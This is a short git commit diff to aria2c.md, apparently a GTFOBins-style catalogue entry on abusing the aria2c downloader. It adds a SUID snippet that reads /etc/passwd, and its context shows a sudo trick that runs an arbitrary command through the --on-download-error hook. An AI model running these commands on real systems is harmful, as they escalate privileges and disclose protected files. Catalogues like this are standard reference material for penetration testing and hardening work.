Update aria2c.md

This commit is contained in:
Yunus AYDIN 2024-08-04 15:34:51 +03:00 committed by GitHub
parent b724cd9bc1
commit ef87c22c36
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -23,6 +23,11 @@ functions:
echo "$COMMAND" > $TF
chmod +x $TF
sudo aria2c --on-download-error=$TF http://x
suid:
- description: It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
- code: |
LFILE='/etc/passwd'
aria2c -i $LFILE
limited-suid:
- code: |
COMMAND='id'